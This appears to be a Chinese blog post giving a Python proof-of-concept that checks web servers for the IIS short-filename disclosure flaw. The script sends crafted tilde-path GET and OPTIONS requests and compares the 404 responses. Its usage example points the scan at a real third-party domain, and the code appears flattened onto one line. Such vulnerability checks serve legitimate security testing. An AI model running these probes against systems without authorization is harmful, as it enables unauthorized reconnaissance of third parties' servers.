使用方法
安装python环境
执行此文件 python [命名].py -u http://baidu.com
#!/usr/bin/env python # -*- encoding: utf-8 -*- """ @File : IIS-ShortName-PoC.py @tell : 用于安全人员检测系统是否存在该漏洞,切勿用于非法用途 """ import argparse import re import requests from urllib.parse import urlparse requests.packages.urllib3.disable_warnings() class Scanner(object): def __init__(self, url: str): self.url = url self.iis_version = None self._url_scheme = '' self._url_netloc = '' self._url_path = '' def is_vulnerable(self) -> bool: self._parse_url() if not self._url_scheme or not self._url_netloc: print('[!]ERROR: Can Not get parse target url.') self._get_iis_version() if not self.iis_version: print('[!]ERROR: Can Not get IIS version from http headers.') return False valid_url = ''.join([self._url_scheme, '://',self._url_netloc, '/*~1*/a.aspx']) invalid_url = ''.join([self._url_scheme, '://',self._url_netloc, '/invalid*~1*/a.aspx']) try: self.valid_resp_get = requests.get(url=valid_url, verify=False, timeout=10) self.valid_resp_options = requests.options(url=valid_url, verify=False, timeout=10) self.invalid_resp_get = requests.get(url=invalid_url, verify=False, timeout=10) self.invalid_resp_options = requests.options(url=invalid_url, verify=False, timeout=10) except Exception as err: print(f'[!]ERROR: HTTP Connection EROOR. {err}') return False if self.valid_resp_get.status_code == 404 and self.invalid_resp_get.status_code != 404: return True elif self.valid_resp_options.status_code == 404 and self.invalid_resp_options.status_code != 404: return True else: return False def _get_iis_version(self): try: resp = requests.get(url=self.url, verify=False, timeout=15) except Exception as err: print(f'[!]ERROR: HTTP Connection EROOR. {err}') return match_obj = re.search('Microsoft-IIS/([0-9].?\.[0-9]?)', str(resp.headers), re.IGNORECASE) if not match_obj: return self.iis_version = match_obj[1] def _parse_url(self): parse_res = urlparse(self.url) self._url_scheme = parse_res[0] self._url_netloc = parse_res[1] self._url_path = parse_res[2] def main(): arg_parser = argparse.ArgumentParser() arg_parser.add_argument('-u','--url', help='The URL of the target.', action='store') args = arg_parser.parse_args() if not args.url: arg_parser.print_help() return scanner = Scanner(url=args.url) if scanner.is_vulnerable(): print('[*]INFO: Target is vulnerable.') print('[*]INFO: <HTTP GET> URL:{} HTTP STATUS CODE:{}'.format(scanner.valid_resp_get.request.url, scanner.valid_resp_get.status_code)) print('[*]INFO: <HTTP GET> URL:{} HTTP STATUS CODE:{}'.format(scanner.invalid_resp_get.request.url, scanner.invalid_resp_get.status_code)) print('[*]INFO: <HTTP OPTIONS> URL:{} HTTP STATUS CODE:{}'.format(scanner.valid_resp_options.request.url, scanner.valid_resp_options.status_code)) print('[*]INFO: <HTTP OPTIONS> URL:{} HTTP STATUS CODE:{}'.format(scanner.invalid_resp_options.request.url, scanner.invalid_resp_options.status_code)) else: print('[*]INFO: Target is NOT vulnerable.') if __name__ == '__main__': main()
结果根据不同接口请求类型,返回值响应200或者404即存在漏洞
解决措施
比较简单、自行百度
1597
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
